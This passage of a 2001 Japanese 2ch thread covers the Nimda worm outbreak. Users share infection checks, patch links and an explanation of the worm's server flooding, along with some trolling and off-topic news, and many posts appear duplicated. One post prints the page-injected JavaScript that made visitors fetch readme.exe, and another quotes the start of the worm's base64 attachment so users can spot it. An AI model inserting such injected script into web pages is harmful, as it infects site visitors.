690 :名無し:01/09/19 13:39 ID:r9Obg67M
トレンドマイクロ株価+17%
691 :ななな:01/09/19 13:39 ID:nUIlkjLM
これってcode red用のパッチをあててると大丈夫なのかな?
692 : :01/09/19 13:40 ID:J6gqWM9Q
693 : :01/09/19 13:41 ID:cFHCRmHk
これってゲイツの陰謀??
>>691
サーバ側はこれからの攻撃に備えておく意味で、Code Red対応を含めて
致命傷となりうる全てのパッチを適用しておいた方がよい。
ただ、パッチでしかないので万が一サービスが起動しなくなってしまうとか
いう可能性も否定できないので注意。
サーバ側はこれからの攻撃に備えておく意味で、Code Red対応を含めて
致命傷となりうる全てのパッチを適用しておいた方がよい。
ただ、パッチでしかないので万が一サービスが起動しなくなってしまうとか
いう可能性も否定できないので注意。
695 : :01/09/19 13:43 ID:qoYGpfgM
旅行代理店や病院、共同通信(東京)など複数の報道機関のサーバーが感染した疑い
山梨学院大(甲府市)のウェブサイトや早稲田大(新宿区)理工学部の一部研究室
マイクロソフト社のインターネット接続サービス「MSN」のサーバーも18日午後
11時ごろ、感染被害を受けた。
ほかにも10−20件のサイトが被害に遭っているという。
山梨学院大(甲府市)のウェブサイトや早稲田大(新宿区)理工学部の一部研究室
マイクロソフト社のインターネット接続サービス「MSN」のサーバーも18日午後
11時ごろ、感染被害を受けた。
ほかにも10−20件のサイトが被害に遭っているという。
697 : :01/09/19 13:52 ID:cBk407FU
誰かまとめてくれ
698 : :01/09/19 13:54 ID:OVdoWqpg
SP2のインストールが途中で止まったりして上手く行かない人へ
1.最小構成インストール、又はブラウザのカスタマイズ(C)
を選ぶ。
2.次の画面の右下のボタン「詳細設定」を押して、「ダウンロードのみ」
を選ぶ。
3.ダウンロードが終わったら、すぐにインストールせずに、
PCをセーフモードで再起動
4.セーフモードで起動した状態でインストール
これでインストールできます。
1.最小構成インストール、又はブラウザのカスタマイズ(C)
を選ぶ。
2.次の画面の右下のボタン「詳細設定」を押して、「ダウンロードのみ」
を選ぶ。
3.ダウンロードが終わったら、すぐにインストールせずに、
PCをセーフモードで再起動
4.セーフモードで起動した状態でインストール
これでインストールできます。
699 : :01/09/19 13:55 ID:I2xFE9vM
700 :うさきてぃ:01/09/19 13:56 ID:/9W6TN7E
■感染チェック
1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
2.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
3.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
■クライアント側の対処
・ブラウザ 対処方法
IE5.0、5.01、5.02、5.5ユーザ:Windows98/Me/2000用IE5.5SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?releaseid=32082
IE5.0、5.01ユーザ:Windows98/2000用IE5.01SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
IE6.0の導入
http://www.microsoft.com/windows/ie_intl/ja/download/default.htm
上記以外の人は、アップデート作業を http://windowsupdate.microsoft.com/?IE で行う。
もしくは雑誌等付録のCD-ROMでも可能(かと思われ)
■サーバ側の対処
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
2.ウィルスチェックソフトのパターンファイル更新
■最低限の常識
・見知らぬファイルのダウンロードや実行は行わない
■参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
MSN http://help.msn.co.jp/notice.htm
Microsoft社 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
2.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
3.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
■クライアント側の対処
・ブラウザ 対処方法
IE5.0、5.01、5.02、5.5ユーザ:Windows98/Me/2000用IE5.5SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?releaseid=32082
IE5.0、5.01ユーザ:Windows98/2000用IE5.01SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
IE6.0の導入
http://www.microsoft.com/windows/ie_intl/ja/download/default.htm
上記以外の人は、アップデート作業を http://windowsupdate.microsoft.com/?IE で行う。
もしくは雑誌等付録のCD-ROMでも可能(かと思われ)
■サーバ側の対処
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
2.ウィルスチェックソフトのパターンファイル更新
■最低限の常識
・見知らぬファイルのダウンロードや実行は行わない
■参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
MSN http://help.msn.co.jp/notice.htm
Microsoft社 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
701 :ナナシサソ:01/09/19 13:59 ID:uy8Pfu/w
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000322.htm
>>インターネット・エクスプローラ ver 5.01以上をお使いの皆様は、
> >こちらのパッチをインストールして、
> >「不適切なMIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する 」
> >という脆弱点を修正することをお勧めします。
>
> こちらのパッチ
> http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
>
> 直リン
> IE5.5用
> http://a148.ms.a.microsoft.com/f/148/1611/2h/download.microsoft.com/download/ie55sp1/secpac17/5.5_SP1/WIN98Me/ja/q290108.exe
> IE5.01用
> http://a120.ms.a.microsoft.com/f/120/1611/2h/download.microsoft.com/download/ie501sp1/secpac17/5.01_SP1/WIN98/ja/q290108.exe
>
> なるほど、まるごとアップデートしなくても、これでOKなのですか…
ってあるから、このパッチだけでいいみたいですよ…
>>インターネット・エクスプローラ ver 5.01以上をお使いの皆様は、
> >こちらのパッチをインストールして、
> >「不適切なMIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する 」
> >という脆弱点を修正することをお勧めします。
>
> こちらのパッチ
> http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
>
> 直リン
> IE5.5用
> http://a148.ms.a.microsoft.com/f/148/1611/2h/download.microsoft.com/download/ie55sp1/secpac17/5.5_SP1/WIN98Me/ja/q290108.exe
> IE5.01用
> http://a120.ms.a.microsoft.com/f/120/1611/2h/download.microsoft.com/download/ie501sp1/secpac17/5.01_SP1/WIN98/ja/q290108.exe
>
> なるほど、まるごとアップデートしなくても、これでOKなのですか…
ってあるから、このパッチだけでいいみたいですよ…
702 : :01/09/19 14:01 ID:gSqSbTks
>J6gqWM9Q
友達いないの?
もう2度と、こなくていいよ〜。
nanasisanのように、われわれ初心者に丁寧に答えてくれている方に(感謝!)
対しての攻撃見てると、ウザイというより悲しすぎ。雰囲気読めよ。
煽るだけでくその役にも立ってないお前は、逝ってよし。
あ、もしかして、かまってほしいためのネタか?
友達いないの?
もう2度と、こなくていいよ〜。
nanasisanのように、われわれ初心者に丁寧に答えてくれている方に(感謝!)
対しての攻撃見てると、ウザイというより悲しすぎ。雰囲気読めよ。
煽るだけでくその役にも立ってないお前は、逝ってよし。
あ、もしかして、かまってほしいためのネタか?
703 :前スレの494:01/09/19 14:03 ID:m9yCiymc
>>1の前スレがおかしいね。
前スレ
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
結局昨日から一睡もできずに、会社のサーバーの修復作業に入る。
被害が酷く、諦めて再インストールするはめになりました。
この際Linuxに移行したいのだけど会社の諸事情で出来ず、
結局Win2Kサーバーにすることに・・・
しかし、メールのやり取りがしばらく出来ないのは不便過ぎる。
はぁー。散々な一日でした・・・
前スレ
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
結局昨日から一睡もできずに、会社のサーバーの修復作業に入る。
被害が酷く、諦めて再インストールするはめになりました。
この際Linuxに移行したいのだけど会社の諸事情で出来ず、
結局Win2Kサーバーにすることに・・・
しかし、メールのやり取りがしばらく出来ないのは不便過ぎる。
はぁー。散々な一日でした・・・
704 :>471:01/09/19 14:04 ID:kNLP5jRY
>IE5.0です。
>昨日の晩、クラックされたどっかの大学のHPをエロサイト対策と
>同じ装備で見に行ったんだけど、大丈夫だったよ。
>半角板に感謝(藁
どんな装備か教えてくんろ
>昨日の晩、クラックされたどっかの大学のHPをエロサイト対策と
>同じ装備で見に行ったんだけど、大丈夫だったよ。
>半角板に感謝(藁
どんな装備か教えてくんろ
705 :_:01/09/19 14:05 ID:X1tZVd5o
ここまで読んだ。
どうやら祭りのようだねワショーイ!
どうやら祭りのようだねワショーイ!
706 : :01/09/19 14:06 ID:bi15wNtM
だー!!
おりゃーもうあきらめただ。
感染したらしょうがない。
IE6が落とせないんだもの・・・
会社のパソコンだしもういいや!
おりゃーもうあきらめただ。
感染したらしょうがない。
IE6が落とせないんだもの・・・
会社のパソコンだしもういいや!
707 : :01/09/19 14:07 ID:lmu1o5BA
708 :_:01/09/19 14:07 ID:X1tZVd5o
Windows6.0ならだいじょぶなようだけど、
Windows6.0betaじゃだめなの?
Windows6.0betaじゃだめなの?
710 : :01/09/19 14:09 ID:FybIJFzw
>>710 ネタか?
711 : :01/09/19 14:09 ID:1.lomIS.
712 :Nimdaをハングルで書いてみました。:01/09/19 14:09 ID:OO3wQbOI
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
□□□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□■■■■■■■■□□■□□□□
□■□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□■□□□□□■■■□■□□□□■□□□□□□□□□■□□□□
□■■■■■■□□□□■□□□□■□□□□□□□□□■■■■■
□□□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■■■■■■■■□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
http://kr.dailynews.yahoo.com/headlines/tc/20010919/maeilbiz/ma2001091907769.html
□□□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□■■■■■■■■□□■□□□□
□■□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□■□□□□□■■■□■□□□□■□□□□□□□□□■□□□□
□■■■■■■□□□□■□□□□■□□□□□□□□□■■■■■
□□□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■■■■■■■■□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
http://kr.dailynews.yahoo.com/headlines/tc/20010919/maeilbiz/ma2001091907769.html
713 : :01/09/19 14:09 ID:4L6u712M
@@@@@@@@ここまで読んだ@@@@@@@@
りゅうくん専用
りゅうくん専用
714 : :01/09/19 14:10 ID:/LsUGfPI
ヨカタヨ・・・前にIE5.5SP2落としといて・・・
715 : :01/09/19 14:10 ID:bi15wNtM
716 : :01/09/19 14:11 ID:N4U8iOCw
717 :前スレ474:01/09/19 14:11 ID:0JDuiGy.
減ってきたと思ったのに、また増え始めた(;´Д`)
http://search.fresheye.com/?kw=readme.eml&term=monthly
http://search.fresheye.com/?kw=readme.eml&term=monthly
718 : :01/09/19 14:12 ID:1L5pANOU
720 : :01/09/19 14:13 ID:ljeMpPVA
msnなんてみてるのは初心者かDQNの証拠。
設定の仕方を知らないだけ。
あんな、偏った編集方針のHPを喜んでみているヤツは国賊。
721 :_:01/09/19 14:14 ID:X1tZVd5o
ひょっとして、これってオサマの仕業なの?
それと、このネタがいしゅつなの?
それと、このネタがいしゅつなの?
722 :あうー:01/09/19 14:15 ID:bi15wNtM
>>718
DLする前にはセキュリティリセットしてあるんだよ〜。
ホントに不思議。ファイル落とせないパソコンになてる。
>>719
周りはMACばっかなので関係無いらしい。
さっき、怖くなって雑誌買ってきてIE5,5入れなおしました。
でも、Ver見てもSP2付いてないですし。
DLする前にはセキュリティリセットしてあるんだよ〜。
ホントに不思議。ファイル落とせないパソコンになてる。
>>719
周りはMACばっかなので関係無いらしい。
さっき、怖くなって雑誌買ってきてIE5,5入れなおしました。
でも、Ver見てもSP2付いてないですし。
723 : :01/09/19 14:16 ID:/LsUGfPI
724 : :01/09/19 14:16 ID:byucTCuc
>>723は誤爆。逝ってきます・・・
726 : :01/09/19 14:17 ID:oestFoJ6
IE6.0ダウソできた。時間かかったけど。
728 : :01/09/19 14:17 ID:q5SfIw9I
riched20.dllを叩き消したんだけど、なんか問題起こるの?
729 : :01/09/19 14:18 ID:wNKH/hOE
若い女性のセックスを5年間禁止 スワジランド
南部アフリカの王国スワジランドからの報道によると、同国政府はエイズ対策のため、
若い女性のセックスを5年間、禁止すると発表した。
男性と握手することも禁止し、禁を破った男性には牛1頭分の罰金が科せられるという。
ttp://www.asahi.com/international/update/0919/003.html
南部アフリカの王国スワジランドからの報道によると、同国政府はエイズ対策のため、
若い女性のセックスを5年間、禁止すると発表した。
男性と握手することも禁止し、禁を破った男性には牛1頭分の罰金が科せられるという。
ttp://www.asahi.com/international/update/0919/003.html
730 :113:01/09/19 14:19 ID:LNEMDmj.
スポニチの速報でカルーセル麻紀の逮捕を知る。
↓
2ちゃんの速報板をチェックしてみようと思う
↓
前スレの存在に気づいて慌てて検索して対策する
正直、カルーセル麻紀メソバーに感謝してる
↓
2ちゃんの速報板をチェックしてみようと思う
↓
前スレの存在に気づいて慌てて検索して対策する
正直、カルーセル麻紀メソバーに感謝してる
731 : :01/09/19 14:19 ID:H2D68rEQ
ウイルス名を逆に読むと、
「Admin(政府)」が「2(to)」「3W(第三次世界大戦)」となることから、
一部には「同時多発テロ事件と関連している」との見方がある。
同長官は「現時点では関連するという証拠はない」と否定した。
ttp://headlines.yahoo.co.jp/hl?a=20010919-00000012-mai-int
アメリカのマスコミはバカすぎ。
ウイルス名に付けるW32ってWindows/32bitの意味だよなぁ。
ていうかウイルス名ってワクチンソフトメーカーとか発見者が付けるんだろ。
「Admin(政府)」が「2(to)」「3W(第三次世界大戦)」となることから、
一部には「同時多発テロ事件と関連している」との見方がある。
同長官は「現時点では関連するという証拠はない」と否定した。
ttp://headlines.yahoo.co.jp/hl?a=20010919-00000012-mai-int
アメリカのマスコミはバカすぎ。
ウイルス名に付けるW32ってWindows/32bitの意味だよなぁ。
ていうかウイルス名ってワクチンソフトメーカーとか発見者が付けるんだろ。
732 : :01/09/19 14:20 ID:ywtmKh3.
WindowsXP を 売 る た め の や ら せ で す か ?
733 :ナナシサン:01/09/19 14:20 ID:ETHVTTR2
カルーセル麻紀て58才なんだよな・・・
見えねぇよ
見えねぇよ
734 :Windowsは厨房専用OS:01/09/19 14:21 ID:tLF66/ns
735 : :01/09/19 14:22 ID:bi15wNtM
736 : :01/09/19 14:23 ID:3AnOZHiA
そう言えばIE4の人はどうするんだろ。
うちのサイトのアクセスログでも4%程度いるけど。
これを機会にIE5かIE6にバージョンアップせにゃならんのか。
うちのサイトのアクセスログでも4%程度いるけど。
これを機会にIE5かIE6にバージョンアップせにゃならんのか。
737 : :01/09/19 14:24 ID:/LsUGfPI
738 : :01/09/19 14:26 ID:/LsUGfPI
そろそろ Lynx使いですけど何か? とか出てきそうだな(´ー`)y-~~
740 : :01/09/19 14:28 ID:lRwN9gws
ネスケで感染サイト見に行った人、キャッシュに*.emlファイル残ってると思うから
不用意に実行/プレビューしないでね。
エディタで開いて
(略)
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
(略)
こーんな感じの内容があったら速攻削除。
ちなみにキャッシュ内のファイル名ではノートン先生はチェックしてくれませんでした。
ニャロメ
不用意に実行/プレビューしないでね。
エディタで開いて
(略)
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
(略)
こーんな感じの内容があったら速攻削除。
ちなみにキャッシュ内のファイル名ではノートン先生はチェックしてくれませんでした。
ニャロメ
741 : :01/09/19 14:28 ID:T.hgQQdI
desktop.emlで検索して数百個HITしたら確定?
742 : :01/09/19 14:28 ID:Gmx2gDPs
743 :win98、5.5SP1使用:01/09/19 14:29 ID:e2EuAUw2
このスレを見て、.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』検索。ヒット無し。
で、その後SP2にバージョンアップした後確認のために再度検索。『readme.exe』ヒット!
これってMSNで感染したってこと?
で、その後SP2にバージョンアップした後確認のために再度検索。『readme.exe』ヒット!
これってMSNで感染したってこと?
744 :ナナシサン:01/09/19 14:30 ID:ETHVTTR2
>741
ホボカクテイ
ホボカクテイ
745 :( ´∀`)さん:01/09/19 14:31 ID:QbKUioVk
ヽ(`Д´)ノ カンセンシチャッタヨ!!
( ) ウワァァン!!
/ ヽ
746 : :01/09/19 14:31 ID:Muk2xWjs
___| ̄|__ | ̄| | ̄| ___| ̄|___ | ̄ ̄ ̄|
| __ | | .| | | |___ ___| | ̄ ̄ ̄ ̄|
|___| ./ | |_| | | | |  ̄ ̄| / //
\ __/ /\ _/ | ___/ | __/ / //
\\|_/\ |___/ |___/// |____////
< /)__∧ Λ_Λ ∧__(\ >
< | |`∀´〉 ◯< `∀´ >◯ 〈`∀´| | >
< ( ) \ / ( ) >
< / /> > |⌒I │ く く\ \ >
< <__フ〈__フ (_) ノ <__,,〉<__〉 >
/______ レ _| ̄|___\\\\
/ |____ | | ̄| / ̄| |_ __ | ___
|\_/ /  ̄ / / | | /_ / |___|
\ / | ̄|/ / | |__| |
\| \ / |____|
| __ | | .| | | |___ ___| | ̄ ̄ ̄ ̄|
|___| ./ | |_| | | | |  ̄ ̄| / //
\ __/ /\ _/ | ___/ | __/ / //
\\|_/\ |___/ |___/// |____////
< /)__∧ Λ_Λ ∧__(\ >
< | |`∀´〉 ◯< `∀´ >◯ 〈`∀´| | >
< ( ) \ / ( ) >
< / /> > |⌒I │ く く\ \ >
< <__フ〈__フ (_) ノ <__,,〉<__〉 >
/______ レ _| ̄|___\\\\
/ |____ | | ̄| / ̄| |_ __ | ___
|\_/ /  ̄ / / | | /_ / |___|
\ / | ̄|/ / | |__| |
\| \ / |____|
747 : :01/09/19 14:32 ID:oaR/VUnY
>「タスクスケジューラの署名を確認しています」のところまでいくと
>「ファイルをダウンロードできないからもう一度やりなおせ」みたいなメッセージが何度やっても出て来て、
>最後までいかないんだけど・・
と書いている人がいたのですが、私も同じ事が起きてDLできません。
どうしたら良いのでしょう?
>「ファイルをダウンロードできないからもう一度やりなおせ」みたいなメッセージが何度やっても出て来て、
>最後までいかないんだけど・・
と書いている人がいたのですが、私も同じ事が起きてDLできません。
どうしたら良いのでしょう?
749 : :01/09/19 14:33 ID:jhDeJex2
750 : :01/09/19 14:34 ID:xejTGd/A
ファイル検索の結果、
readme.exe=なし
MEP51B3.TMP.EXE=なし
*.eml=1つハケーン(だがこれは漏れが保存したメール)
という結果。直前にIE5.5SP2を導入した為感染してなかった。
そういえばうちメールでウィルス来たことないんだよなぁ…
いいことなんだがちょっと悲しい…
readme.exe=なし
MEP51B3.TMP.EXE=なし
*.eml=1つハケーン(だがこれは漏れが保存したメール)
という結果。直前にIE5.5SP2を導入した為感染してなかった。
そういえばうちメールでウィルス来たことないんだよなぁ…
いいことなんだがちょっと悲しい…
751 :LINUX使い:01/09/19 14:35 ID:tLF66/ns
ぎゃはははは。
MSNJAPANだけじゃなくて
WINDOWSアップデートサーバに接続した奴も感染してるんじゃなーのか?
ぎゃはははははは。ばーか、まぬけだな。おまえら
MSNJAPANだけじゃなくて
WINDOWSアップデートサーバに接続した奴も感染してるんじゃなーのか?
ぎゃはははははは。ばーか、まぬけだな。おまえら
752 : :01/09/19 14:35 ID:KvKCI3nI
それでなんでサーバーが重くなるのですか?
初心者ですいません。
初心者ですいません。
753 :_:01/09/19 14:36 ID:zYHPZHs6
ガイシュツだったらスマソ。
感染したHPの最後には
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
っていう記述が挿入されている。
これによって"readme.eml"が別Windowで起動して、同時にReadme.exeがDLされる。
だったら、スクリプトの実行を不許可にしておけば、IEのバージョンあげなくても
大丈夫なんじゃない?
漏れって浅はか?
感染したHPの最後には
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
っていう記述が挿入されている。
これによって"readme.eml"が別Windowで起動して、同時にReadme.exeがDLされる。
だったら、スクリプトの実行を不許可にしておけば、IEのバージョンあげなくても
大丈夫なんじゃない?
漏れって浅はか?
755 : :01/09/19 14:37 ID:/LsUGfPI
756 : :01/09/19 14:38 ID:FfVSsuh6
>749
俺も今5.01SP2にしたばっかりだけど大丈夫だったYO!
ネタだろ。
俺も今5.01SP2にしたばっかりだけど大丈夫だったYO!
ネタだろ。
757 : :01/09/19 14:38 ID:xejTGd/A
758 :肉屋 N50cc-10p82.ppp11.odn.ad.jp:01/09/19 14:39 ID:3ep6/OEQ
いっその事IE6にしてみようと落としてるんだけど、20Mは結構な量だな。
759 : :01/09/19 14:40 ID:xejTGd/A
感染している場合、readme.exeってどこに保存されるの?
>754
それがね、それでも出来ないの・・・
それがね、それでも出来ないの・・・
762 :衝撃の名無しさん:01/09/19 14:41 ID:3Vs43vRs
俺も今5.5SP2にした。恐いね。
確認って、バージョン情報の更新バージョンがSP2ならいいんでしょ?
確認って、バージョン情報の更新バージョンがSP2ならいいんでしょ?
763 : :01/09/19 14:41 ID:xejTGd/A
あと、感染するのはMSNのトップページだけ?
昨日WinXPの特集ページ見ていたんだが…
昨日WinXPの特集ページ見ていたんだが…
764 : :01/09/19 14:42 ID:/LsUGfPI
>>762 OK
765 : :01/09/19 14:42 ID:xejTGd/A
766 : :01/09/19 14:42 ID:mB/qaWyo
gooとかgoogleとかは大丈夫かな。gooのフリーメール使ってるけど、
開くの怖いな。
開くの怖いな。
767 : :01/09/19 14:43 ID:jhDeJex2
768 : :01/09/19 14:43 ID:xejTGd/A
Script切ってMSN見てくるか…
>>763
MSNに限らずあちこちに蔓延するモノ(すでに蔓延している)なんで、
念のためウイルスチェック(最新のパターンファイルで)をしておくとよい。
あとreadme.exeのファイル検索も。
利用法とも引っかからなければおそらく大丈夫。念には念を入れておくのが良いでしょう。
MSNに限らずあちこちに蔓延するモノ(すでに蔓延している)なんで、
念のためウイルスチェック(最新のパターンファイルで)をしておくとよい。
あとreadme.exeのファイル検索も。
利用法とも引っかからなければおそらく大丈夫。念には念を入れておくのが良いでしょう。
770 : :01/09/19 14:44 ID:kNF/Pobc
>>752
NimdaはIISサーバーに感染した場合、他のIISサーバーに
自己複製しようとして、侵入用のリクエストを自動的に
打ちまくる。たとえそれがIISサーバーではなくてApache
だろうと、なんだろうとおかまいなし。
感染が広がってリクエスト量がネットに広がれば広がるほど
混雑が増す、というわけ。もちろんサーバー自体攻撃するほうも
されるほうも処理が増えるから遅くなるし、クライアントがNimdaで
送信するメールもその混雑を増加させる。
百害あって一理無し。
NimdaはIISサーバーに感染した場合、他のIISサーバーに
自己複製しようとして、侵入用のリクエストを自動的に
打ちまくる。たとえそれがIISサーバーではなくてApache
だろうと、なんだろうとおかまいなし。
感染が広がってリクエスト量がネットに広がれば広がるほど
混雑が増す、というわけ。もちろんサーバー自体攻撃するほうも
されるほうも処理が増えるから遅くなるし、クライアントがNimdaで
送信するメールもその混雑を増加させる。
百害あって一理無し。
771 :自分5.0なんだけどアップデートしようか怖くて悩んでいる人:01/09/19 14:45 ID:bQrRO.9U
743 :win98、5.5SP1使用 :01/09/19 14:29 ID:e2EuAUw2
このスレを見て、.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』検索。ヒット無し。
で、その後SP2にバージョンアップした後確認のために再度検索。『readme.exe』ヒット!
これってMSNで感染したってこと?
756 : :01/09/19 14:38 ID:FfVSsuh6
>749
俺も今5.01SP2にしたばっかりだけど大丈夫だったYO!
ネタだろ。
5.01SP2と5.5SP2って違う場所からダウンロードじゃなかった
でしたっけ?それならば5.01はOKってことだったら、やばいですよね…
このスレを見て、.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』検索。ヒット無し。
で、その後SP2にバージョンアップした後確認のために再度検索。『readme.exe』ヒット!
これってMSNで感染したってこと?
756 : :01/09/19 14:38 ID:FfVSsuh6
>749
俺も今5.01SP2にしたばっかりだけど大丈夫だったYO!
ネタだろ。
5.01SP2と5.5SP2って違う場所からダウンロードじゃなかった
でしたっけ?それならば5.01はOKってことだったら、やばいですよね…
773 :衝撃の名無しさん:01/09/19 14:45 ID:3Vs43vRs
774 : :01/09/19 14:46 ID:I3H4ktQc
775 : :01/09/19 14:46 ID:tLF66/ns
あほだなおまえら。スクリプトOFFにしたらMSNはみれないんだYO。
だから、ばかみたいにひっかかるだろ。
だから、ばかみたいにひっかかるだろ。
776 :750=757=759=763=765=768=ちかんに注意:01/09/19 14:46 ID:xejTGd/A
>>728
# 誰も書いてなさそうなのでお返事。
riched20.dllはワードパッドとか複数のアプリケーションで使われています。
従って、消してしまうとそれらのアプリケーションが動かなくなってしまったり、
表示がおかしくなってしまったりします。
# 誰も書いてなさそうなのでお返事。
riched20.dllはワードパッドとか複数のアプリケーションで使われています。
従って、消してしまうとそれらのアプリケーションが動かなくなってしまったり、
表示がおかしくなってしまったりします。
778 : :01/09/19 14:48 ID:iAsksBJ.
実家で親がPC買って楽しそうにネットサーフィンしてるけど…
どうやって親に説明したもんかな。
直接出向いて設定したほうが安全か。
どうやって親に説明したもんかな。
直接出向いて設定したほうが安全か。
779 :_:01/09/19 14:48 ID:zYHPZHs6
落ち着こうよ。
要はスクリプト切っとけばとりあえず大丈夫なんだろ?
見れなくなるページも出てくるけど、感染の確立はないはず。
慌ててバージョンアップする必要ない気がするんだが。
みんなで微妙に不安を煽ってないか?
ま、2chだからそれが正しいのかもしれないけどね。
要はスクリプト切っとけばとりあえず大丈夫なんだろ?
見れなくなるページも出てくるけど、感染の確立はないはず。
慌ててバージョンアップする必要ない気がするんだが。
みんなで微妙に不安を煽ってないか?
ま、2chだからそれが正しいのかもしれないけどね。
780 :名無しさん:01/09/19 14:48 ID:K0x/0bfc
>770
coderedの時も不要なトラフィック増えたけどこんどのNIMDAはそれ以上に
不正アタックがきてる。まだ一日たってないのにこの普及の速さは驚異的。
IISをつかってる人は管理スキル低すぎる。
coderedの時も不要なトラフィック増えたけどこんどのNIMDAはそれ以上に
不正アタックがきてる。まだ一日たってないのにこの普及の速さは驚異的。
IISをつかってる人は管理スキル低すぎる。
781 : :01/09/19 14:50 ID:/LsUGfPI
IIS使ってるcodered対策もしてない糞管理者は逝ってよし
782 : :01/09/19 14:50 ID:byucTCuc
■感染チェック
1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
2.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
3.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
■クライアント側の対処
・ブラウザ 対処方法
IE5.0、5.01、5.02、5.5ユーザ:Windows98/Me/2000用IE5.5SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?releaseid=32082
IE5.0、5.01ユーザ:Windows98/2000用IE5.01SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
IE6.0の導入
http://www.microsoft.com/windows/ie_intl/ja/download/default.htm
上記以外の人は、アップデート作業を http://windowsupdate.microsoft.com/?IE で行う。
■サーバ側の対処
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
■ウィルスチェックソフトのパターンファイル更新
■最低限の常識
・見知らぬファイルのダウンロードや実行は行わない
■参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
